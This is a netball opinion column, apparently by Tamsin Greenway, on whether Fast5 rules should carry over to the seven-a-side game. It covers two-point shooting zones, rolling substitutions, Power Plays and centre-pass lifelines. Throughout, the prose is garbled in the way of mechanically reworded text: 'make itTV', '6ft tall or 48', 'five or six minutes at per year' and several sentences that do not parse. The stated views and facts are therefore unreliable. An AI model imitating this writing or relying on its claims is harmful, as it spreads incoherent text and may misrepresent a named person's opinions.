Tamsin Greenway ponders the merit in implementing any of the Fast5 rules into netball

In the next portion of this weeks column, Tamsin Greenway ponders about the virtues (or not) of executing some of the Fast5 rules to the entire format of netball…
Lately , there was a questionnaire in Australia regarding what rules people would want to see changed from the game.
As the sport continues to drive forward, rule changes to make itTV or bring in a wider audience will be considered
Bearing this in mind, and after the epic British Fast5 All-Stars Championships in the Box last weekend, I wished to take a look at some of the rules which have been thrown around and that could be thought about or implemented in the game that was seven-a-side.
I think the shooting one is very interesting… and probably gets the most amount of uproar when suggesting a shift.
I definitely would not need to find long-bombs in terms of shooting from outside the circle in a 60-minute game. However, I am still curious about how the ring could split into one-point and two-point locations.
I am not saying that it ought to alter in the league but we have created a game where we have big, tall shooters and unless youre close to becoming 6ft tall or 48, its becoming harder to play at the circle.
There are still a few [briefer ] GAs floating about but what selectors are currently looking at, and what children know, is that you need to have tall shooters with close to pole percentages to make it. We went through the years of shifting every GA !
I believe that I think that were making that a problem with kids than embracing the simple fact that if its possible to shoot long and due to this we also have produced a dread of shooting at long distance you should.
A few of those Australian fans were saying that they had trialled it that people simply passed it in and out and making a mockery of their game when I put it out.
But, I feel that just backs up my point. Most players dont shoot from space anymore and Australia, along with others, are a leader in this change in the game. New Zealand simply won a World Cup on shooting from 17, whereas we can not overlook that.
The question is can it help to secure extra time and be able to play 60 minutes out there? Would it change approaches and group selection?
Splitting the circle to two and one points would certainly change the dynamic of the defence since if shooters are moving out of space, how you win ball suddenly becomes very different. The roles of the shooting circle would also alter.
Particularly with some of those blowout games in Superleague, with one and two point shots, could it likewise assist? Look at a team like those who finished eighth last year – would Sophie Hankin shooting from distance and Karyn Bailey being in a position to rally have shifted results and matches if these things were made to two, possibly?
That is the reason why I dont think that we ought to take it off the table. I am aware there are a great deal of traditionalists out there and that I get as it is also that I really like our game, but I think that the sport has changed hugely in the last couple of years. I dont see that theres any reason why it explored some more to see whether it has a location or could not be viewed at.
Im not a major fan of subs. A whole great deal of people may say that its the one to alter and that impact is brought by it and that they dont mind it.
Firstly Im not entirely against it, like I do think that we do need to get rid of the dodgy timeouts – as honestly the imitation injuries are very easy to see, but I can not get my mind around unlimited rolling subs. If there was a limitation to these or there has been a move towards the strategic timeout which Suncorp has introduced afterward Id be more keen.
My issues come from both a coachs and participants point of view. As a participant, in certain places it is not always that simple to go make a direct impact in five or six minutes at per year. Therefore, unless you are with a complete shocker, as a player you should have the ability to work things out and personally be given the time to do so.
I also think it could very easily become a justification for a lack of coaching. It is a very easy cop-out if a participant is not quite doing what you only want to roll on a different sub par, try something fresh. Therell be times this needs to occur but then this wouldnt be a continuous if youve done your prep.
I always liked to give my players the chance in quarter-time to attempt to change things and to trust that player send and to go back on. I believe we must look at how this filters from elite degree and when the only answer ever would be to keep trying new players out we might get rid of the essence of what coaching and playing is all about.
I really like the Power Play Fast5, it is brilliant, but I do not feel that it has a place at the game. Its that simple in my book.
With Centre Passes well, I dont think you should be provided an excess lifeline. Shooting from distance takes implementation and skill, being awarded points or the ball back to help get closer excitement or games just takes it a lot.
Your defensive Centre Pass ought to be as strong as the attacking Centre Pass. You must have structures and tactical elements that mean you could win ball off teams no matter, so I truly dont feel that you need to be extended a lifeline simply because youre losing. That is a part of sport – you lose or you win.
A portion of all netball is its what you opt to do with it and that you have the chunk 50 percent of the time. I think there are better ways to get games and I definitely do not believe that this is one of them.
